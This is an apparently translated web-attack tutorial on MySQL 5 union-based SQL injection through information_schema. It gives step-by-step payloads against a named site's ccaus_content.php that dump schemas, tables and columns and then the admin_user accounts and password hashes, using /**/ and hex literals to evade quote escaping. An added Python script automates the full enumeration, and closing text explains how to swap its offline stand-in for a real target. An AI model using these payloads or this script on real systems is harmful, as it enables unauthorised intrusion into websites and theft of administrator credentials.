Dump the databases
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
(1,..,n are filler columns: their count must equal the number of columns in the original query, and SCHEMA_NAME goes in a column the page actually echoes back. limit 1,1 returns the second schema, limit 2,1 the third, and so on; information_schema itself is usually the first one.)
Dump the tables
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<HEX value of the database name>/**/limit/**/1,1
(A 0x... hex literal is a string in MySQL, so no quote characters are needed; this keeps the payload working when magic_quotes_gpc/addslashes escapes quotes. /**/ stands in for spaces.)
Dump the columns
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<HEX value of the table name>/**/limit/**/1,1
(Filtering on TABLE_NAME alone also matches same-named tables in other schemas; add and/**/TABLE_SCHEMA=<HEX value of the database name>, as the worked example below does.)
MySQL 5 advanced injection: dumping tables through information_schema

Example as follows (information_schema exists from MySQL 5.0 onwards; the injected union has 5 columns to match the original query and column 4 is the one echoed back, and/**/1=2 empties the real result set so the union row is what gets displayed, and the trailing /* comments out the rest of the original query):

1. Dump the tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Stepping the offset (limit 1,1, limit 2,1, ...), the fourth table (limit 3,1) turned out to be admin_user.

2. Dump the columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x61646D696E5F75736572 is the hex encoding of admin_user; step the offset the same way to list every column)
3. Dump the password
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
(0x7c is '|'. concat joins the three columns into one string because only one column is echoed, and the | markers make the value easy to find in the page. Step the offset to get the remaining admin rows.)
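The whole procedure above (schemata, then tables, then columns, then rows, one limit offset per request) as a script. This is an added example, not code from the original post or from the site it targets. FAKE_DB and fake_fetch are a constructed stand-in for the target's MySQL server and vulnerable page so it runs offline; hex_literal, build_payload, extract, enumerate_rows and run_enumeration are names chosen here. The sample schema, table and column names mirror the post's (yd_teamnet, admin_user, ID/ACCOUNT/PASSWORD); the row contents are made up. Unlike the post's steps 1 and 2, every stage wraps the echoed value in concat(0x7c,...,0x7c) so one extractor serves all of them.

```python
"""Added example (not code from the original post): automates the MySQL 5
information_schema enumeration described above, stepping `limit <offset>,1`
one request at a time. Identifier values are sent as hex literals (no quote
characters), spaces are written as /**/, and the echoed column is wrapped in
0x7c ('|') markers so it can be pulled out of the HTML response."""
import re
from typing import Callable, Dict, List, Optional

# Constructed sample data standing in for the target's MySQL server (assumption).
FAKE_DB = {
    "information_schema": {},
    "yd_teamnet": {
        "ccaus_content": [],
        "news": [],
        "links": [],
        "admin_user": [{"ID": "1", "ACCOUNT": "admin",
                        "PASSWORD": "e10adc3949ba59abbe56e057f20f883e"}],
    },
}


def hex_literal(name: str) -> str:
    """'yd_teamnet' -> '0x79645F7465616D6E6574': a MySQL string literal without quotes."""
    return "0x" + name.encode().hex().upper()


def build_payload(base: str, expr: str, source: str, offset: int,
                  where: Optional[str] = None, ncols: int = 5, pos: int = 4) -> str:
    """Union payload in the page's shape: original id, `and 1=2` to empty the real
    result set, numbered filler columns with concat(0x7c,expr,0x7c) at the echoed
    position, optional where clause, `limit offset,1`. ncols/pos (5 and 4 here)
    must match the vulnerable query; find them with `order by N` first."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[pos - 1] = f"concat(0x7c,{expr},0x7c)"
    parts = [base, "and", "1=2", "union", "select", ",".join(cols), "from", source]
    if where:
        parts += ["where", where]
    parts += ["limit", f"{offset},1/*"]
    return "/**/".join(parts)


def extract(html: str, nfields: int = 1) -> Optional[List[str]]:
    """Pull the |a|b|...| run produced by the concat markers out of a response.
    A page that already contains '|' characters would need a rarer marker."""
    m = re.search(r"\|" + r"([^|]*)\|" * nfields, html)
    return list(m.groups()) if m else None


def enumerate_rows(fetch: Callable[[str], str], base: str, expr: str, source: str,
                   where: Optional[str] = None, nfields: int = 1,
                   max_rows: int = 200) -> List[List[str]]:
    """Request limit 0,1 / 1,1 / 2,1 ... until the markers stop appearing."""
    rows: List[List[str]] = []
    for offset in range(max_rows):
        row = extract(fetch(build_payload(base, expr, source, offset, where)), nfields)
        if row is None:
            break
        rows.append(row)
    return rows


def fake_fetch(payload: str) -> str:
    """Constructed stand-in for GET ccaus_content.php?ccausid=<payload>: evaluates
    the union query against FAKE_DB and echoes the 4th column into an HTML page."""
    q = payload.replace("/**/", " ")
    source = re.search(r" from (\S+)", q, re.I).group(1).lower()
    offset = int(re.search(r" limit (\d+),1", q, re.I).group(1))
    where = {k.lower(): bytes.fromhex(v).decode()
             for k, v in re.findall(r"(\w+)=0x([0-9A-Fa-f]+)", q)}
    if source == "information_schema.schemata":
        rows = [{"SCHEMA_NAME": s} for s in FAKE_DB]
    elif source == "information_schema.tables":
        rows = [{"TABLE_NAME": t} for t in FAKE_DB.get(where["table_schema"], {})]
    elif source == "information_schema.columns":
        tbl = FAKE_DB[where["table_schema"]][where["table_name"]]
        rows = [{"COLUMN_NAME": c} for c in (tbl[0] if tbl else {})]
    else:  # a plain table; the stand-in only knows the one schema
        rows = FAKE_DB["yd_teamnet"].get(source, [])
    if offset >= len(rows):
        return "<html><body>no such record</body></html>"
    args = re.search(r"concat\((.*?)\)", q).group(1).split(",")
    value = "".join(bytes.fromhex(a[2:]).decode() if a.startswith("0x")
                    else rows[offset][a] for a in args)
    return f"<html><body><h1>{value}</h1></body></html>"


def run_enumeration(fetch: Callable[[str], str] = fake_fetch,
                    base: str = "13240") -> Dict[str, object]:
    """The post's three steps in sequence, ending with the admin_user dump."""
    schemas = [r[0] for r in enumerate_rows(fetch, base, "SCHEMA_NAME",
                                            "information_schema.SCHEMATA")]
    db = next(s for s in schemas if s != "information_schema")
    tables = [r[0] for r in enumerate_rows(fetch, base, "TABLE_NAME", "information_schema.TABLES",
                                           f"TABLE_SCHEMA={hex_literal(db)}")]
    target = next(t for t in tables if "admin" in t.lower())
    cols = [r[0] for r in enumerate_rows(
        fetch, base, "COLUMN_NAME", "information_schema.COLUMNS",
        f"TABLE_NAME={hex_literal(target)}/**/and/**/TABLE_SCHEMA={hex_literal(db)}")]
    # concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c), as in step 3 of the post
    rows = enumerate_rows(fetch, base, ",0x7c,".join(cols), target, nfields=len(cols))
    return {"db": db, "tables": tables, "columns": cols, "rows": rows}
```

Calling run_enumeration() walks the stand-in and returns the database name, its four tables (admin_user at offset 3, as in the post), the three admin_user columns and the one row. Against a real host, replace fake_fetch with a function that GETs the vulnerable URL with the payload as the id parameter and returns the body; the extractor is the part that needs attention there, since any '|' already on the page will throw off the marker match, so pick a marker string that does not occur in the normal response.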